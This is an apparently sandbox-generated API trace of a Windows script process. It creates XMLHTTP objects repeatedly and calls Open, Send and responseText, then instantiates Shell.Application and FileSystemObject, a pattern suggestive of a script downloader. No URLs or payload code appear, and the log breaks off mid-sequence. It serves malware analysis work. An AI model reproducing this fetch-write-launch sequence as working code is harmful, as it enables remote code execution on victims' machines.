	[0332.813] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0332.813] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0332.813] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b90) returned 0x0
	[0332.813] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0332.813] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bf8) returned 0x0
	[0332.813] ??2@YAPEAX_K@Z () returned 0x62f310
	[0332.813] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bf8, pUnkSite=0x62f310) 
	[0332.813] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0332.813] XMLHTTPRequest:IUnknown:Release (This=0x49c5bf8) returned 0x0
	[0332.813] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b90) returned 0x0
	[0332.813] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b90) returned 0x3
	[0332.813] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0332.813] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0332.814] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0332.814] longjmp () 
	[0332.814] longjmp () 
	[0332.814] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0332.814] SysStringLen (param_1=0x0) returned 0x0
	[0332.814] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0332.814] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0332.814] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0332.814] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0332.814] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0332.814] ??2@YAPEAX_K@Z () returned 0x62f330
	[0332.814] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0332.814] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0332.814] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0332.814] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0332.814] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0332.814] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0332.814] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0332.814] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0332.815] longjmp () 
	[0332.815] longjmp () 
	[0332.815] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0332.815] SysStringLen (param_1=0x0) returned 0x0
	[0332.815] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0332.815] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0332.815] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7500) returned 0x0
	[0332.815] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0332.815] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7568) returned 0x0
	[0332.815] ??2@YAPEAX_K@Z () returned 0x62f310
	[0332.815] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7568, pUnkSite=0x62f310) 
	[0332.815] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0332.815] XMLHTTPRequest:IUnknown:Release (This=0x49c7568) returned 0x0
	[0332.815] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7500) returned 0x0
	[0332.815] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7500) returned 0x3
	[0332.815] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0332.815] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0332.816] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0332.816] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0332.816] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0332.816] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0335.233] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0335.233] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0335.233] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0335.234] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0335.234] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0335.234] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0335.234] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0335.234] SysStringLen (param_1=0x0) returned 0x0
	[0335.234] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0335.234] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0335.234] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0335.234] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0335.234] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0335.234] ??2@YAPEAX_K@Z () returned 0x62f350
	[0335.234] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0335.234] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0335.234] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0335.234] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0335.234] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0335.234] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0335.235] SysStringLen (param_1=0x0) returned 0x0
	[0335.235] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0335.238] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0335.238] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0335.238] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0335.238] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0335.238] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0335.238] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0336.269] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0336.269] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0336.269] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0336.270] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0336.270] SysStringLen (param_1=0x0) returned 0x0
	[0336.270] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0336.270] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0336.270] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7500) returned 0x0
	[0336.270] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0336.270] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0336.271] ??2@YAPEAX_K@Z () returned 0x62f310
	[0336.271] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0336.271] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0336.271] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0336.271] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7500) returned 0x0
	[0336.271] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7500) returned 0x3
	[0336.271] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0336.271] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0336.273] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0336.273] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0336.273] SysStringLen (param_1=0x0) returned 0x0
